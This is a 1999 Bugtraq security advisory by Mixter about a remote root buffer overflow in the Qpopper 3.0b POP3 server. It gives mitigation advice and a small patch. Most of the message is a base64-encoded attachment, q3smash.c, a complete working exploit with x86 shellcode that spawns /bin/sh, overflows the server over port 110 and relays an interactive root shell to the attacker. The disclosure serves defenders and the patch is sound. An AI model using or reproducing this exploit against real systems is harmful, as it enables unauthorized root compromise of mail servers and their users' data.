[12773] in bugtraq
serious Qpopper 3.0 vulnerability
daemon@ATHENA.MIT.EDU (Mixter)
Tue Nov 30 12:14:45 1999
Mime-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-493565404-943922963=:6421"
Content-Id: <Pine.LNX.4.04.9911300152180.6421@aviation.net>
Message-Id: <Pine.LNX.4.04.9911300056540.6421-300000@aviation.net>
Date: Tue, 30 Nov 1999 01:53:11 +0100
Reply-To: Mixter <mixter@NEWYORKOFFICE.COM>
From: Mixter <mixter@NEWYORKOFFICE.COM>
X-To: BUGTRAQ@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--8323328-493565404-943922963=:6421
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
Content-ID: <Pine.LNX.4.04.9911300152181.6421@aviation.net>
Greetings,
There is a remote buffer overflow in the qpop 3.0 server code
that can lead to remote root compromise. Exploit attached.
Vulnerable versions are all versions of qpop 3.0b,
affected operating systems are _all_ systems that run it.
Versions 2.52 and 2.53 do not contain this bug.
The latest version available is 3.0b20, which is vulnerable,
along with all previous 3.0 versions.
I advise everyone running qpop3.0b servers to shut down the server
IMMEDIATELY by disabling the entry in inetd.conf and then downgrading
to v2.53 or another program until an official patch has been released.
Details: The buffer overflow(s) are present in pop_msg.c (sounds familiar..)
starting at line 68. All configurations and different builds seem to be
vulnerable, as either vsprintf or sprintf are used, which both do not check
bounds on the input buffers for each argument.
Exploiting: The overflow code should not contain characters 0x0c/x17/x20,
because it would get interpreted as more than one argument and hence fail.
Patching: I included a small patch. You should only use inofficial patches
if you totally need to use version 3.0, otherwise downgrade and wait for a
patch from Qualcomm. IF you patch this by yourself, please consider that
the buffer pointer CHANGES and the buffer is about 30 bytes LESS than the
defined MAXLINELEN!!
PS: The installation file suggests to run qpopper without tcpd, e.g.:
pop3 stream tcp nowait root /usr/local/lib/qpopper qpopper -s
I would NOT suggest doing it that way. Use:
pop3 stream tcp nowait root /usr/sbin/tcpd qpopper -s
instead. At least for me it works behind a tcp wrapper, and that way,
you can use access control and every connection _attempt_ gets logged.
Mixter
________________________
mixter@newyorkoffice.com
members.tripod.com/mixtersecurity
--8323328-493565404-943922963=:6421
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="q3smash.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.04.9911300149230.6421@aviation.net>
Content-Description:
Content-Disposition: ATTACHMENT; FILENAME="q3smash.c"
LyoNCiAqIFFwb3BwZXIgMy4wYiByZW1vdGUgZXhwbG9pdCBmb3IgeDg2IExp
bnV4ICh0ZXN0ZWQgb24gUmVkSGF0LzIuMC4zOCkNCiAqDQogKiBEZWMgMTk5
OSBieSBNaXh0ZXIgPG1peHRlckBuZXd5b3Jrb2ZmaWNlLmNvbT4gLyBodHRw
Oi8vMTMzNy50c3gub3JnDQogKg0KICogRXhwbG9pdHMgcG9wX21zZyBidWZm
ZXIgb3ZlcmZsb3cgdG8gc3Bhd24gYSByZW1vdGUgcm9vdCBzaGVsbC4NCiAq
IFRoaXMgcHJvYmFibHkgd29ya3Mgd2l0aCB0aGUgb2xkIHFwb3AyIGNvZGUg
Zm9yIGJzZCwgc29sYXJpcyBhbnlvbmU/DQogKiANCiAqIFdBUk5JTkc6IFlP
VSBBUkUgVVNJTkcgVEhJUyBTT0ZUV0FSRSBPTiBZT1VSIE9XTiBSSVNLLiBU
SElTIElTIEENCiAqIFBST09GLU9GLUNPTkNFUFQgUFJPR1JBTSBBTkQgWU9V
IFRBS0UgRlVMTCBSRVNQT05TSUJJTElUWSBGT1IgV0hBVCBZT1UNCiAqIERP
IFdJVEggSVQhIERPIE5PVCBBQlVTRSBUSElTIEZPUiBJTExJQ0lUIFBVUlBP
U0VTIQ0KICovDQoNCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0
cmluZy5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPHN0ZGxp
Yi5oPg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9z
b2NrZXQuaD4NCiNpbmNsdWRlIDxuZXRpbmV0L2luLmg+DQojaW5jbHVkZSA8
YXJwYS9pbmV0Lmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxl
cnJuby5oPg0KDQojZGVmaW5lIE5PUAkJMHg5MA0KI2RlZmluZSBMRU4JCTEw
MzINCiNkZWZpbmUgQ09ERVNUQVJUCTg4MA0KI2RlZmluZSBSRVQJCTB4YmZm
ZmQ2NTUNCg0KLyogeDg2IGxpbnV4IHNoZWxsY29kZS4gdGhpcyBjYW4gYmUg
YSBzaW1wbGUgZXhlY3ZlIHRvIC9iaW4vc2ggb24gYWxsDQogICBzeXN0ZW1z
LCBidXQgTVVTVCBOT1QgY29udGFpbiB0aGUgY2hhcmFjdGVycyAneDE3JyBv
ciAneDBjJyBiZWNhdXNlDQogICB0aGF0IHdvdWxkIHNwbGl0IHRoZSBleHBs
b2l0IGNvZGUgaW50byBzZXBhcmF0ZSBhcmcgYnVmZmVycyAgICAgICAgKi8N
Cg0KY2hhciAqc2hlbGxjb2RlID0NCiJceGViXHgyMlx4NWVceDg5XHhmM1x4
ODlceGY3XHg4M1x4YzdceDA3XHgzMVx4YzBceGFhXHg4OVx4ZjlceDg5XHhm
MFx4YWIiDQoiXHg4OVx4ZmFceDMxXHhjMFx4YWJceGIwXHgwNFx4MDRceDA3
XHhjZFx4ODBceDMxXHhjMFx4ODlceGMzXHg0MFx4Y2RceDgwIg0KIlx4ZThc
eGQ5XHhmZlx4ZmZceGZmL2Jpbi9zaCI7DQoNCnVuc2lnbmVkIGxvbmcgcmVz
b2x2ZSAoY2hhciAqKTsNCnZvaWQgdGVybSAoaW50LCBpbnQpOw0KdW5zaWdu
ZWQgbG9uZyBnZXRfc3AgKCk7DQoNCmludCANCm1haW4gKGludCBhcmdjLCBj
aGFyICoqYXJndikNCnsNCiAgY2hhciBidWZmZXJbTEVOXTsNCiAgY2hhciAq
Y29kZXB0ciA9IHNoZWxsY29kZTsNCiAgbG9uZyByZXRhZGRyID0gUkVUOw0K
ICBpbnQgaSwgczsNCiAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCg0KICBp
ZiAoYXJnYyA8IDIpDQogICAgew0KICAgICAgcHJpbnRmICgidXNhZ2U6ICVz
IDxob3N0PiBbb2Zmc2V0XVxuIiwgYXJndlswXSk7DQogICAgICBwcmludGYg
KCJ1c2Ugb2Zmc2V0IC0xIHRvIHRyeSBsb2NhbCBlc3BcbiIpOw0KICAgICAg
ZXhpdCAoMCk7DQogICAgfQ0KDQogIGlmIChhcmdjID4gMikNCiAgICB7DQog
ICAgICBpZiAoYXRvaSAoYXJndlsyXSkgPT0gLTEpDQoJew0KCSAgLyogODAw
MCA9IGFwcHJveC4gYnl0ZSBvZmZzZXQgdG8gcXBvcHBlcidzIHRvcCBvZiBz
dGFjaw0KCSAgICAgYXQgdGhlIHRpbWUgaXQgcHJpbnRzIG91dCB0aGUgYXV0
aCBlcnJvciBtZXNzYWdlICovDQoJICByZXRhZGRyID0gZ2V0X3NwICgpIC0g
ODAwMCAtIExFTjsNCgkgIHByaW50ZiAoIlVzaW5nIGxvY2FsIGVzcCBhcyBy
ZXQgYWRkcmVzcy4uLlxuIik7DQoJfQ0KICAgICAgcmV0YWRkciArPSBhdG9p
IChhcmd2WzJdKTsNCiAgICB9DQoNCiAgZm9yIChpID0gMDsgaSA8IExFTjsg
aSsrKQ0KICAgICooYnVmZmVyICsgaSkgPSBOT1A7DQoNCiAgZm9yIChpID0g
Q09ERVNUQVJUICsgMjsgaSA8IExFTjsgaSArPSA0KQ0KICAgICooaW50ICop
ICZidWZmZXJbaV0gPSByZXRhZGRyOw0KDQogIGZvciAoaSA9IENPREVTVEFS
VDsgaSA8IENPREVTVEFSVCArIHN0cmxlbiAoc2hlbGxjb2RlKTsgaSsrKQ0K
ICAgICooYnVmZmVyICsgaSkgPSAqKGNvZGVwdHIrKyk7DQoNCiAgYnVmZmVy
WzBdID0gJ0EnOw0KICBidWZmZXJbMV0gPSAnVSc7DQogIGJ1ZmZlclsyXSA9
ICdUJzsNCiAgYnVmZmVyWzNdID0gJ0gnOw0KICBidWZmZXJbNF0gPSAnICc7
DQoNCiAgcHJpbnRmICgicXBvcCAzLjAgcmVtb3RlIHJvb3QgZXhwbG9pdCAo
bGludXgpIGJ5IE1peHRlclxuIik7DQogIHByaW50ZiAoIltyZXR1cm4gYWRk
cmVzczogMHglbHggYnVmZmVyIHNpemU6ICVkIGNvZGUgc2l6ZTogJWRdXG4i
LA0KCSAgcmV0YWRkciwgc3RybGVuIChidWZmZXIpLCBzdHJsZW4gKHNoZWxs
Y29kZSkpOw0KDQogIGZmbHVzaCAoMCk7DQoNCiAgc2luLnNpbl9mYW1pbHkg
PSBBRl9JTkVUOw0KICBzaW4uc2luX3BvcnQgPSBodG9ucyAoMTEwKTsNCiAg
c2luLnNpbl9hZGRyLnNfYWRkciA9IHJlc29sdmUgKGFyZ3ZbMV0pOw0KICBz
ID0gc29ja2V0IChBRl9JTkVULCBTT0NLX1NUUkVBTSwgMCk7DQoNCiAgaWYg
KGNvbm5lY3QgKHMsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9m
IChzdHJ1Y3Qgc29ja2FkZHIpKSA8IDApDQogICAgew0KICAgICAgcGVycm9y
ICgiY29ubmVjdCIpOw0KICAgICAgZXhpdCAoMCk7DQogICAgfQ0KDQogIHN3
aXRjaCAod3JpdGUgKHMsIGJ1ZmZlciwgc3RybGVuIChidWZmZXIpKSkNCiAg
ICB7DQogICAgY2FzZSAwOg0KICAgIGNhc2UgLTE6DQogICAgICBmcHJpbnRm
IChzdGRlcnIsICJ3cml0ZSBlcnJvcjogJXNcbiIsIHN0cmVycm9yIChlcnJu
bykpOw0KICAgICAgYnJlYWs7DQogICAgZGVmYXVsdDoNCiAgICAgIGJyZWFr
Ow0KICAgIH0NCiAgd3JpdGUgKHMsICJcblxuIiwgMSk7DQogIHRlcm0gKHMs
IDApOw0KDQogIHJldHVybiAwOw0KfQ0KDQp1bnNpZ25lZCBsb25nDQpyZXNv
bHZlIChjaGFyICpob3N0KQ0Kew0KICBzdHJ1Y3QgaG9zdGVudCAqaGU7DQog
IHN0cnVjdCBzb2NrYWRkcl9pbiB0bXA7DQogIGlmIChpbmV0X2FkZHIgKGhv
c3QpICE9IC0xKQ0KICAgIHJldHVybiAoaW5ldF9hZGRyIChob3N0KSk7DQog
IGhlID0gZ2V0aG9zdGJ5bmFtZSAoaG9zdCk7DQogIGlmIChoZSkNCiAgICBt
ZW1jcHkgKChjYWRkcl90KSAmIHRtcC5zaW5fYWRkci5zX2FkZHIsIGhlLT5o
X2FkZHIsIGhlLT5oX2xlbmd0aCk7DQogIGVsc2UNCiAgICB7DQogICAgICBw
ZXJyb3IgKCJnZXRob3N0YnluYW1lIik7DQogICAgICBleGl0ICgwKTsNCiAg
ICB9DQogIHJldHVybiAodG1wLnNpbl9hZGRyLnNfYWRkcik7DQp9DQoNCnVu
c2lnbmVkIGxvbmcNCmdldF9zcCAodm9pZCkNCnsNCiAgX19hc21fXyAoIm1v
dmwgJWVzcCwgJWVheCIpOw0KfQ0KDQp2b2lkDQp0ZXJtIChpbnQgcCwgaW50
IGMpDQp7DQogIGNoYXIgYnVmW0xFTl07DQogIGZkX3NldCByZmRzOw0KICBp
bnQgaTsNCg0KICB3aGlsZSAoMSkNCiAgICB7DQogICAgICBGRF9aRVJPICgm
cmZkcyk7DQogICAgICBGRF9TRVQgKHAsICZyZmRzKTsNCiAgICAgIEZEX1NF
VCAoYywgJnJmZHMpOw0KICAgICAgaWYgKHNlbGVjdCAoKHAgPiBjID8gcCA6
IGMpICsgMSwgJnJmZHMsIE5VTEwsIE5VTEwsIE5VTEwpIDwgMSkNCglyZXR1
cm47DQogICAgICBpZiAoRkRfSVNTRVQgKGMsICZyZmRzKSkNCgl7DQoJICBp
ZiAoKGkgPSByZWFkIChjLCBidWYsIHNpemVvZiAoYnVmKSkpIDwgMSkNCgkg
ICAgZXhpdCAoMCk7DQoJICBlbHNlDQoJICAgIHdyaXRlIChwLCBidWYsIGkp
Ow0KCX0NCiAgICAgIGlmIChGRF9JU1NFVCAocCwgJnJmZHMpKQ0KCXsNCgkg
IGlmICgoaSA9IHJlYWQgKHAsIGJ1Ziwgc2l6ZW9mIChidWYpKSkgPCAxKQ0K
CSAgICBleGl0ICgwKTsNCgkgIGVsc2UNCgkgICAgd3JpdGUgKGMsIGJ1Ziwg
aSk7DQoJfQ0KICAgIH0NCn0NCg==
--8323328-493565404-943922963=:6421
Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="qp3b20.patch"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.04.9911300149231.6421@aviation.net>
Content-Description:
Content-Disposition: ATTACHMENT; FILENAME="qp3b20.patch"
IyBhcHBseSB0aGlzIGluIHRoZSBxcG9wcGVyMy4wYjIwL3BvcHBlci8gZGly
ZWN0b3J5IHdpdGggcGF0Y2ggPCBxcDNiMjAucGF0Y2gNCi0tLSBwb3BfbXNn
LmMub2xkCU1vbiBOb3YgMjkgMjM6NDI6MDMgMTk5OQ0KKysrIHBvcF9tc2cu
YwlNb24gTm92IDI5IDIzOjUyOjA4IDE5OTkNCkBAIC02NSw3ICs2NSw3IEBA
DQogICAgIC8qICBBcHBlbmQgdGhlIG1lc3NhZ2UgKGZvcm1hdHRlZCwgaWYg
bmVjZXNzYXJ5KSAqLw0KICAgICBpZiAoZm9ybWF0KSB7DQogI2lmZGVmIEhB
VkVfVlBSSU5URg0KLSAgICAgICAgdnNwcmludGYobXAsZm9ybWF0LGFwKTsN
CisgICAgICAgIHZzbnByaW50ZihtcCxNQVhMSU5FTEVOIC0gMTAwLCBmb3Jt
YXQsYXApOw0KICNlbHNlDQogIyBpZmRlZiBQWVJBTUlEDQogCWFyZzEgPSB2
YV9hcmcoYXAsIGNoYXIgKik7DQpAQCAtNzQsOSArNzQsOSBAQA0KIAlhcmc0
ID0gdmFfYXJnKGFwLCBjaGFyICopOw0KIAlhcmc1ID0gdmFfYXJnKGFwLCBj
aGFyICopOw0KIAlhcmc2ID0gdmFfYXJnKGFwLCBjaGFyICopOw0KLSAgICAg
ICAgKHZvaWQpc3ByaW50ZihtcCxmb3JtYXQsIGFyZzEsIGFyZzIsIGFyZzMs
IGFyZzQsIGFyZzUsIGFyZzYpOw0KKyAgICAgICAgKHZvaWQpc3ByaW50Ziht
cCxNQVhMSU5FTEVOIC0gMTAwLCBmb3JtYXQsIGFyZzEsIGFyZzIsIGFyZzMs
IGFyZzQsIGFyZzUsIGFyZzYpOw0KICMgZWxzZQ0KLSAgICAgICAgKHZvaWQp
c3ByaW50ZihtcCxmb3JtYXQsKChpbnQgKilhcClbMF0sKChpbnQgKilhcClb
MV0sKChpbnQgKilhcClbMl0sDQorICAgICAgICAodm9pZClzcHJpbnRmKG1w
LE1BWExJTkVMRU4gLSAxMDAsIGZvcm1hdCwoKGludCAqKWFwKVswXSwoKGlu
dCAqKWFwKVsxXSwoKGludCAqKWFwKVsyXSwNCiAJCSAgICAgICgoaW50ICop
YXApWzNdLCgoaW50ICopYXApWzRdKTsNCiAjIGVuZGlmDQogI2VuZGlmDQo=
--8323328-493565404-943922963=:6421--
